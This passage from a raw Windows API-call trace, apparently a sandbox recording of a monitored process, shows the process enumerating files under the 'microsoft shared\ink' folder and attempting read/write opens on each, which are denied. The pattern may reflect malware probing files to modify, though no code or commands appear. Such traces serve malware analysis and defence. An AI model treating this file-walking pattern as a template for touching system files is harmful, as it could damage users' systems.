(HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85ee0 [0099.760] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x85ee0, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU\\tipresx.dll.mui") returned 73 [0099.760] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hu-hu\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.760] GetLastError () returned 0x5 [0099.760] GetLastError () returned 0x5 [0099.760] SetLastError (dwErrCode=0x5) [0099.760] GetLastError () returned 0x5 [0099.760] SetLastError (dwErrCode=0x5) [0099.760] GetLastError () returned 0x5 [0099.761] SetLastError (dwErrCode=0x5) [0099.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85ee0 | out: hHeap=0x20000) returned 1 [0099.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0099.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d1b8 | out: hHeap=0x20000) returned 1 [0099.761] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.761] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.761] FindNextFileW (in: hFindFile=0x78010, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x90, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x8c658, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x90, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧⠀")) returned 0 [0099.761] FindClose (in: hFindFile=0x78010 | out: hFindFile=0x78010) returned 1 [0099.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0099.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0099.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0099.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ecf0 | out: hHeap=0x20000) returned 1 [0099.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e1c8 | out: hHeap=0x20000) returned 1 [0099.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0099.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35250 | out: hHeap=0x20000) returned 1 [0099.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46048 | out: hHeap=0x20000) returned 1 [0099.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0099.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351d0 [0099.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351d0 | out: hHeap=0x20000) returned 1 [0099.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0099.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0099.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0099.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0099.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0099.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f798 [0099.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0099.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0099.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a6f8 [0099.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0099.762] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.762] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.762] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.762] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a6f8 | out: hHeap=0x20000) returned 1 [0099.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.762] AreFileApisANSI () returned 1 [0099.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrcommonlm.dat", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrcommonlm.dat", lpUsedDefaultChar=0x0) returned 67 [0099.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cf50 [0099.762] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.762] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0099.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0099.762] AreFileApisANSI () returned 1 [0099.762] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 67 [0099.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x86) returned 0x81fc8 [0099.762] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x81fc8, cchWideChar=67 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrcommonlm.dat") returned 67 [0099.762] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrcommonlm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrcommonlm.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0099.763] GetFileType (hFile=0x368) returned 0x1 [0099.763] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81fc8 | out: hHeap=0x20000) returned 1 [0099.763] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0099.763] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0099.763] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0099.763] CloseHandle (hObject=0x368) returned 1 [0099.764] AreFileApisANSI () returned 1 [0099.764] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 67 [0099.764] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x86) returned 0x82208 [0099.764] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x82208, cchWideChar=67 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrcommonlm.dat") returned 67 [0099.764] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrcommonlm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrcommonlm.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.764] GetLastError () returned 0x5 [0099.764] GetLastError () returned 0x5 [0099.764] SetLastError (dwErrCode=0x5) [0099.764] GetLastError () returned 0x5 [0099.764] SetLastError (dwErrCode=0x5) [0099.764] GetLastError () returned 0x5 [0099.764] SetLastError (dwErrCode=0x5) [0099.764] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82208 | out: hHeap=0x20000) returned 1 [0099.764] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0099.764] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.764] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cf50 | out: hHeap=0x20000) returned 1 [0099.764] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.764] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.764] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6eba2ec1, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0xa07693a9, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x6eba2ec1, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="HWRCustomization", cAlternateFileName="HWRCUS~1")) returned 1 [0099.764] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.764] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0099.764] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.764] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0099.764] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0099.764] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0099.764] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0099.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0099.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0099.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0099.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0099.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0099.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0099.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0099.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0099.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0099.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0099.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0099.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0099.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75e40 [0099.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0099.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f2c8 [0099.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0099.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0099.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8aeb0 [0099.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f2c8 | out: hHeap=0x20000) returned 1 [0099.765] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.765] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.765] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.765] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0099.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0099.765] AreFileApisANSI () returned 1 [0099.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\HWRCustomization", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\HWRCustomization", lpUsedDefaultChar=0x0) returned 68 [0099.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d3c8 [0099.765] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.765] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0099.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0099.766] AreFileApisANSI () returned 1 [0099.766] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0099.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x88) returned 0x82cb8 [0099.766] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x82cb8, cchWideChar=68 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\HWRCustomization") returned 68 [0099.766] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\HWRCustomization" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrcustomization"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.766] GetLastError () returned 0x5 [0099.766] GetLastError () returned 0x5 [0099.766] SetLastError (dwErrCode=0x5) [0099.766] GetLastError () returned 0x5 [0099.766] SetLastError (dwErrCode=0x5) [0099.766] GetLastError () returned 0x5 [0099.766] SetLastError (dwErrCode=0x5) [0099.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82cb8 | out: hHeap=0x20000) returned 1 [0099.766] AreFileApisANSI () returned 1 [0099.766] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0099.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x88) returned 0x82568 [0099.766] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x82568, cchWideChar=68 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\HWRCustomization") returned 68 [0099.767] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\HWRCustomization" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrcustomization"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.767] GetLastError () returned 0x5 [0099.767] GetLastError () returned 0x5 [0099.767] SetLastError (dwErrCode=0x5) [0099.767] GetLastError () returned 0x5 [0099.767] SetLastError (dwErrCode=0x5) [0099.767] GetLastError () returned 0x5 [0099.767] SetLastError (dwErrCode=0x5) [0099.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82568 | out: hHeap=0x20000) returned 1 [0099.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0099.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0099.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d3c8 | out: hHeap=0x20000) returned 1 [0099.767] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.767] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.767] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.767] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0099.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0099.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60348 [0099.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0099.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0099.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a400 [0099.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60348 | out: hHeap=0x20000) returned 1 [0099.767] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85c57278, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xb269cdea, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xb269cdea, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x79bc0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="hwrenclm.dat", cAlternateFileName="")) returned 1 [0099.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0099.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0099.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0099.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0099.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0099.768] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0099.768] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8af48 [0099.768] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ace8 [0099.768] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\HWRCustomization\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x77fd0 [0099.768] FindNextFileW (in: hFindFile=0x77fd0, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6eba2ec1, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0xa07693a9, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x6eba2ec1, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0099.768] FindNextFileW (in: hFindFile=0x77fd0, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6eba2ec1, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0xa07693a9, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x6eba2ec1, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0099.768] FindClose (in: hFindFile=0x77fd0 | out: hFindFile=0x77fd0) returned 1 [0099.768] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ace8 | out: hHeap=0x20000) returned 1 [0099.768] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8b078 [0099.768] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46ba8 [0099.768] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0099.768] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0099.768] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0099.768] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0099.768] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0099.768] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b078 | out: hHeap=0x20000) returned 1 [0099.768] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8af48 | out: hHeap=0x20000) returned 1 [0099.768] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0099.769] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0099.769] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46ba8 | out: hHeap=0x20000) returned 1 [0099.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0099.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35130 [0099.769] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.769] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35130 | out: hHeap=0x20000) returned 1 [0099.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0099.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0099.769] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.769] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0099.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0099.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0099.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fdc8 [0099.769] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0099.769] HeapFree (in: hHeap=0x20000, dwFlags=0x0, 